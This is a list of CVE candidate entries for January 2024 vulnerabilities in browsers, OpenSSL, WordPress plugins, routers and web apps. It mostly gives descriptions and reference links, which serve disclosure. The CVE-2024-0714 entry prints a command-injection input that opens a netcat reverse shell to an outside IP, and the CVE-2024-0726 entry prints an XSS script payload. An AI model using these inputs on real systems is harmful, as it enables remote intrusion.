CVE 2024 742 Candidate It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1867152 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1867152 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 741 Candidate An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1864587 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1864587 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 739 Candidate A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/vLswXhWxUrs8 | URL:https://note.zhaoj.in/share/vLswXhWxUrs8 | MISC:https://vuldb.com/?ctiid.251562 | URL:https://vuldb.com/?ctiid.251562 | MISC:https://vuldb.com/?id.251562 | URL:https://vuldb.com/?id.251562 Assigned (20240119)
CVE 2024 738 Candidate A vulnerability, which was classified as critical, has been found in 个人开源 mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability. MISC:https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md | URL:https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md | MISC:https://vuldb.com/?ctiid.251561 | URL:https://vuldb.com/?ctiid.251561 | MISC:https://vuldb.com/?id.251561 | URL:https://vuldb.com/?id.251561 Assigned (20240119)
CVE 2024 737 Candidate A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560. MISC:https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.251560 | URL:https://vuldb.com/?ctiid.251560 | MISC:https://vuldb.com/?id.251560 | URL:https://vuldb.com/?id.251560 Assigned (20240119)
CVE 2024 736 Candidate A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559. MISC:https://0day.today/exploit/39249 | URL:https://0day.today/exploit/39249 | MISC:https://vuldb.com/?ctiid.251559 | URL:https://vuldb.com/?ctiid.251559 | MISC:https://vuldb.com/?id.251559 | URL:https://vuldb.com/?id.251559 Assigned (20240119)
CVE 2024 735 Candidate A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability. MISC:https://blog.csdn.net/DMZNX/article/details/135683738 | URL:https://blog.csdn.net/DMZNX/article/details/135683738 | MISC:https://vuldb.com/?ctiid.251558 | URL:https://vuldb.com/?ctiid.251558 | MISC:https://vuldb.com/?id.251558 | URL:https://vuldb.com/?id.251558 Assigned (20240119)
CVE 2024 734 Candidate A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/vo1KOw3EYmBK | URL:https://note.zhaoj.in/share/vo1KOw3EYmBK | MISC:https://vuldb.com/?ctiid.251557 | URL:https://vuldb.com/?ctiid.251557 | MISC:https://vuldb.com/?id.251557 | URL:https://vuldb.com/?id.251557 Assigned (20240119)
CVE 2024 733 Candidate A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556. MISC:https://note.zhaoj.in/share/3GznRo9vWRJ8 | URL:https://note.zhaoj.in/share/3GznRo9vWRJ8 | MISC:https://vuldb.com/?ctiid.251556 | URL:https://vuldb.com/?ctiid.251556 | MISC:https://vuldb.com/?id.251556 | URL:https://vuldb.com/?id.251556 Assigned (20240119)
CVE 2024 732 Candidate A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555. MISC:https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt | URL:https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt | MISC:https://vuldb.com/?ctiid.251555 | URL:https://vuldb.com/?ctiid.251555 | MISC:https://vuldb.com/?id.251555 | URL:https://vuldb.com/?id.251555 Assigned (20240119)
CVE 2024 731 Candidate A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability. MISC:https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt | URL:https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt | MISC:https://vuldb.com/?ctiid.251554 | URL:https://vuldb.com/?ctiid.251554 | MISC:https://vuldb.com/?id.251554 | URL:https://vuldb.com/?id.251554 Assigned (20240119)
CVE 2024 730 Candidate A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability. MISC:https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e | URL:https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e | MISC:https://vuldb.com/?ctiid.251553 | URL:https://vuldb.com/?ctiid.251553 | MISC:https://vuldb.com/?id.251553 | URL:https://vuldb.com/?id.251553 Assigned (20240119)
CVE 2024 729 Candidate A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552. MISC:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | URL:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | MISC:https://vuldb.com/?ctiid.251552 | URL:https://vuldb.com/?ctiid.251552 | MISC:https://vuldb.com/?id.251552 | URL:https://vuldb.com/?id.251552 Assigned (20240119)
CVE 2024 728 Candidate A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551. MISC:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | URL:https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | MISC:https://vuldb.com/?ctiid.251551 | URL:https://vuldb.com/?ctiid.251551 | MISC:https://vuldb.com/?id.251551 | URL:https://vuldb.com/?id.251551 Assigned (20240119)
CVE 2024 727 Candidate Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. CONFIRM:https://security.netapp.com/advisory/ntap-20240208-0006/ | MISC:1.0.2zj git commit | URL:https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539 | MISC:1.1.1x git commit | URL:https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8 | MISC:3.0.13 git commit | URL:https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2 | MISC:3.1.5 git commit | URL:https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c | MISC:3.2.1 git commit | URL:https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a | MISC:OpenSSL Advisory | URL:https://www.openssl.org/news/secadv/20240125.txt Assigned (20240119)
CVE 2024 726 Candidate A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability. MISC:https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4 | URL:https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4 | MISC:https://vuldb.com/?ctiid.251549 | URL:https://vuldb.com/?ctiid.251549 | MISC:https://vuldb.com/?id.251549 | URL:https://vuldb.com/?id.251549 Assigned (20240119)
CVE 2024 725 Candidate A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548. MISC:https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.251548 | URL:https://vuldb.com/?ctiid.251548 | MISC:https://vuldb.com/?id.251548 | URL:https://vuldb.com/?id.251548 Assigned (20240119)
CVE 2024 723 Candidate A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547. MISC:https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.251547 | URL:https://vuldb.com/?ctiid.251547 | MISC:https://vuldb.com/?id.251547 | URL:https://vuldb.com/?id.251547 Assigned (20240119)
CVE 2024 722 Candidate A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link | URL:https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link | MISC:https://vuldb.com/?ctiid.251546 | URL:https://vuldb.com/?ctiid.251546 | MISC:https://vuldb.com/?id.251546 | URL:https://vuldb.com/?id.251546 Assigned (20240119)
CVE 2024 721 Candidate A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. MISC:https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf | URL:https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf | MISC:https://vuldb.com/?ctiid.251545 | URL:https://vuldb.com/?ctiid.251545 | MISC:https://vuldb.com/?id.251545 | URL:https://vuldb.com/?id.251545 Assigned (20240119)
CVE 2024 720 Candidate A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link | URL:https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link | MISC:https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720 | URL:https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720 | MISC:https://vuldb.com/?ctiid.251544 | URL:https://vuldb.com/?ctiid.251544 | MISC:https://vuldb.com/?id.251544 | URL:https://vuldb.com/?id.251544 Assigned (20240119)
CVE 2024 719 Candidate The Tabs Shortcode and Widget WordPress plugin through 1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks MISC:https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/ | URL:https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/ Assigned (20240119)
CVE 2024 718 Candidate A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543. MISC:https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md | URL:https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md | MISC:https://vuldb.com/?ctiid.251543 | URL:https://vuldb.com/?ctiid.251543 | MISC:https://vuldb.com/?id.251543 | URL:https://vuldb.com/?id.251543 Assigned (20240119)
CVE 2024 717 Candidate A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability. MISC:https://github.com/999zzzzz/D-Link | URL:https://github.com/999zzzzz/D-Link | MISC:https://vuldb.com/?ctiid.251542 | URL:https://vuldb.com/?ctiid.251542 | MISC:https://vuldb.com/?id.251542 | URL:https://vuldb.com/?id.251542 Assigned (20240119)
CVE 2024 716 Candidate A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md | URL:https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md | MISC:https://vuldb.com/?ctiid.251541 | URL:https://vuldb.com/?ctiid.251541 | MISC:https://vuldb.com/?id.251541 | URL:https://vuldb.com/?id.251541 Assigned (20240119)
CVE 2024 715 Candidate Expression Language Injection vulnerability in Hitachi Global Link Manager on Windows allows Code Injection.This issue affects Hitachi Global Link Manager: before 8.8.7-03. MISC:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html | URL:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html Assigned (20240119)
CVE 2024 714 Candidate A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.251540 | URL:https://vuldb.com/?ctiid.251540 | MISC:https://vuldb.com/?id.251540 | URL:https://vuldb.com/?id.251540 Assigned (20240119)
CVE 2024 713 Candidate A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view?usp=sharing | URL:https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view?usp=sharing | MISC:https://vuldb.com/?ctiid.251539 | URL:https://vuldb.com/?ctiid.251539 | MISC:https://vuldb.com/?id.251539 | URL:https://vuldb.com/?id.251539 Assigned (20240119)
CVE 2024 712 Candidate A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md | URL:https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md | MISC:https://vuldb.com/?ctiid.251538 | URL:https://vuldb.com/?ctiid.251538 | MISC:https://vuldb.com/?id.251538 | URL:https://vuldb.com/?id.251538 Assigned (20240119)
CVE 2024 711 Candidate The Buttons Shortcode and Widget WordPress plugin through 1.16 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. MISC:https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/ | URL:https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/ Assigned (20240119)
CVE 2024 709 Candidate The Cryptocurrency Widgets – Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172 | URL:https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve Assigned (20240118)
CVE 2024 708 Candidate The Landing Page Cat – Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to access landing pages that may not be public. MISC:https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php | URL:https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve Assigned (20240118)
CVE 2024 707 Candidate ** REJECT ** Not a valid vulnerability. Assigned (20240118)
CVE 2024 706 Candidate ** REJECT ** This was a false positive report. Assigned (20240118)
CVE 2024 705 Candidate The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve Assigned (20240118)
CVE 2024 704 Candidate ** REJECT ** very low impact - impractical to correct Assigned (20240118)
CVE 2024 703 Candidate The Sticky Buttons – floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve Assigned (20240118)
CVE 2024 702 Candidate The Oliver POS – A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions hooked via AJAX in the includes/class-pos-bridge-install.php file in all versions up to, and including, 2.4.1.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more. MISC:https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11 | URL:https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve Assigned (20240118)
CVE 2024 701 Candidate The UserPro plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 5.1.6. This is due to the use of client-side restrictions to enforce the 'Disabled registration' Membership feature within the plugin's General settings. This makes it possible for unauthenticated attackers to register an account even when account registration has been disabled by an administrator. MISC:https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 | URL:https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve Assigned (20240118)
CVE 2024 700 Candidate The Simple Tweet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tweet this text value in all versions up to, and including, 1.4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request | URL:https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request | MISC:https://wordpress.org/plugins/simple-tweet/ | URL:https://wordpress.org/plugins/simple-tweet/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve Assigned (20240118)
CVE 2024 699 Candidate The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'add_image_from_url' function in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Editor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. MISC:https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php | URL:https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve Assigned (20240118)
CVE 2024 698 Candidate The Easy!Appointments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141 | URL:https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve Assigned (20240118)
